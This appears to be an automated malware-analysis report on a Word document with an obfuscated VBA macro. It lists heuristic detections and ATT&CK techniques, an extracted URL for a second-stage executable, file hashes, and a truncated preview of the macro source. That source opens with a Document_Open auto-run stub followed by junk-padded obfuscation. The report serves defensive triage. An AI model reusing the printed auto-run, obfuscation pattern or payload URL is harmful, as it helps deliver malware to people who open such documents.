Verdict: MALICIOUS
Risk Score: 264

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample contains a VBA macro that executes cmd.exe via the Shell() function. The macro is obfuscated and appears to be designed to download and execute a second-stage payload from a URL, which is a common technique for malware delivery. The presence of a Document_Open macro further indicates malicious intent.
Heuristics (8)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project — VBA macros present (5 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Obfuscated VBA Shell command with URL | critical | OLE_VBA_OBFUSCATED_SHELL_URL | VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| cmd.exe reference in VBA | high | OLE_VBA_CMD | cmd.exe reference in VBA |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URL (referenced by macro): https://thomeddiesharefile.com/Uni/winxpversion.exe
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 72066 bytes |

SHA-256: b2eaf82b0adc1778f00fb94fa66fdf9dda091cc456edeebba30780cbf186b206
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 11 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call saksyzcsxhgfmuq
End Sub
Private Sub saksyzcsxhgfmuq()
Dim s34 As Object
Dim ksvtbkcuedbtldlqwlefd As Date
Dim ylrvhnuwqefeswlrzmkzcn
Dim eqpwiofjcb
If 0 = 23 Then
Else
Dim jlughjjypaapsx
Dim kyewqgfkvirtmzjj As Object
End If
Dim agzfeebdpvczotnxcvztofhwcy As Variant
Dim uxankvrbabqxoyauyeeeej As Date
Dim ssqvlrjtbhtzcuexbq
Dim enoyxitvbdowjurpnwq
Dim cwnrju
uxankvrbabqxoyauyeeeej = 53
Do While 346 < 7
Select Case nqguyesbxaebnxtlpmxjqgzxxpd
Case "«³Þî?ÀçµÓ£?ᢨÅ", "?Çêö?²", "?¸éó�ºæ¸Üµ?ç¥?Ä"
gtclojj = "?Çáì?°åºß??Þ§¨Àé«´æï?±ÞÊÛ³�ó£¡ÌÚ "
Case "?Ëñà?»ãÇ×£?ð?¥", "¤¶æô?¸ô¼"
suffix = "�¼Þô Äì"
Case "§Æôç?ÀòÃÌ??ã°£ÈÖ ¶çå?²êÁÐ ?ó?©ÃãªÅè", "ª¿Þà?¿òËÛ¡?ç"
gtclojj = "Êïæ?ÇìÍܧ?Ú¨?ÅÛªºàï?³áÂØ«?ò??ØØ?"
Case Else
evhrgtqxjkbneejvbczilsdnkxj = "mfdskohgzrhkr"
End Select
Dim igfgtjbn
Dim mvsvvwg
Dim vcgfbeglibfvglbowyihilodvm
Exit Do
Randomize
Loop
Dim kooak As Variant
Dim ocwab As Date
Dim gxocmpq
Dim gshxbbcx
Dim erahquliqfgrbvhkqtvliixlpytit
ocwab = 76
Do While 832 < 7
Select Case kaoyalcbxfejjdjv
Case "�Áîñ?¶ê¶ß¨?Þ£ Åì?¾ãì?ÆîºÉ²�è", " »îà", "?Áôá?¼äÇÏ¡?ë°?Æá?Ççõ¤¼"
shwfsrmzh = "¥¼ãõ¥ºò"
Case "§Êåî", "?¼ãò?½ë»Þ¯?ò®§Øä¢"
suffix = "£ºáä?º÷¸Õ??ê«?Óá?"
Case "«¸óí?¼ßÎÜ??ܧ?Îé¡»àô?", "?Åàß?ÁâÁд?ñ¤?Õê?¸éð?´îµØ¤?å??Ñߢ"
shwfsrmzh = "?½âï?·â¸Ð?�ì¤�ÎØ?Äìá"
Case Else
lgghhwrmrsamgtleyqw = "tbmy"
End Select
Dim defmtesryveqoh
Dim xchvmyvbdymiuymwber
Dim ppnpk
Exit Do
Randomize
Loop
Dim zikwihqkbslpllmdt As Variant
Dim kpql As Date
Dim frdqidvlvvfkhitotenuqtzjlw
Dim qptsmnazidypagyfouxsnu
Dim zzmrqmfaqtakxvmkuuzaafcuevxoizqjbuza
kpql = 82
Do While 177 < 3
Select Case mvcgeaktif
Case "¨¸Üà�¹ÞÉ˳?å©?Ñ⪽ãî?³èÆÐ¨?á¡§Òã?º", "¬Áæä?¸õÆÜ", "?¾è÷�ÄÞÃÚ±?맨ÒÞ?¶ëé?Ãô"
aexzsdudrnfgsqjkjeaxwtplgypufhjz = "?Éçò?²Þ"
Case "?µñ", "¥Çáì¡ÃõÎȯ?í¦©Ôí¨¸Ûø?»âÇÕ±?"
suffix = "«´òó?²à¶Ø¤?ç°?ÂÙ?Èêé?ÁôÆÕ�?ë? Ì⪽"
Case "?Äßö?±ì¿Ê??æ??×Þ¤¶òì?µôÊ×", "¥Àôß�Áæ¿Ç±�Ü?Íå?´èç?µæÌØ"
aexzsdudrnfgsqjkjeaxwtplgypufhjz = "?»âõ¢Åó¸É¯?òª§Íé?²âô?Áð¸Ï³?ß??Ì"
Case Else
wwtkfkfesxywokcwllwhsgkmlppzwjx = "loftmgplu"
End Select
Dim cwftcyvoskevfvusujzbjsuvdvoszm
Dim gbvjzmdsowaqrzlsklihg
Dim objqgk
Exit Do
Randomize
Loop
Dim qvdauikrglspjzhsrmhv As Variant
Dim djbobqrmeraqbzjvvwoudceiiybjkzopo As Date
Dim lmxhujgbymwfuntrlznbsgyjtit
Dim lhmczbebfjnenmxxaokwngktg
Dim rqxjhpnzxtgyyewsuwunsofewjis
djbobqrmeraqbzjvvwoudceiiybjkzopo = 91
Do While 304 < 5
Select Case tzwjbjzysngkkuyoijdfwvzf
Case "?Æðò?²óËÝ®?ïª�Î×?ËÝ÷�ÀãÌÝ?æ¤?ÔÜ£", "«Âîó?ÈçÃߥ?梩Ùë«·äî?", "©½äè?ÂõµÍµ?Ú£?Åì¬ÅÞå?Ãâ½Ô©?ñ??Ä×"
sboqltlqautaczqknaxwlek = "¤Åñó?»ì¼É¯?ࡨËÙ�Áãó?ÈñÇʯ?è¥�Ìä"
Case "?Çëß¡°çÊÔ¢?ç?¡", "§´ãç�µÞËܨ ò?¥ÂÖ§Åñà?ÂæºÌµ?Ü¥�Ù"
suffix = "?¹æì?¶ëÇÙ¯"
Case "©ºôð?ÁàÊÛ �Û¡£ÒÙ«Åéó?²àÉÊ??è¯", "?Åßå?±è¾Ç¯�祩Ãê?Ëò"
sboqltlqautaczqknaxwlek = "Ãáä?µìÃݨ�ð??ÍÚ?¾åì"
Case Else
snmfimjxogyvaxf = "kpuavjwurlcrx"
End Select
Dim rceckcvwstntm
Dim cpbompl
Dim qldcjmidznljumvsqpfyjcrklqo
Exit Do
Randomize
Loop
If 9 = 8 Then
Dim nbdkvthnhfxufp
Else
Dim qvvvhgurocvktgvtfqlastqrxxobzwcrahs
Dim apzsqarmfhqk As String
apzsqarmfhqk = "kbGumBt"
Dim dssraeklnrdrypgqjnwttminsr As String
dssraeklnrdrypgqjnwttminsr = "YmooUJMF"
Dim dnymqhdbjscqtsob
... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 143872 bytes |

SHA-256: 0c7039aefbdfa9e2cbada52ddcb543e3f2c7652bb12820b97a23d873a280819e
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 11 long base64-like blob(s))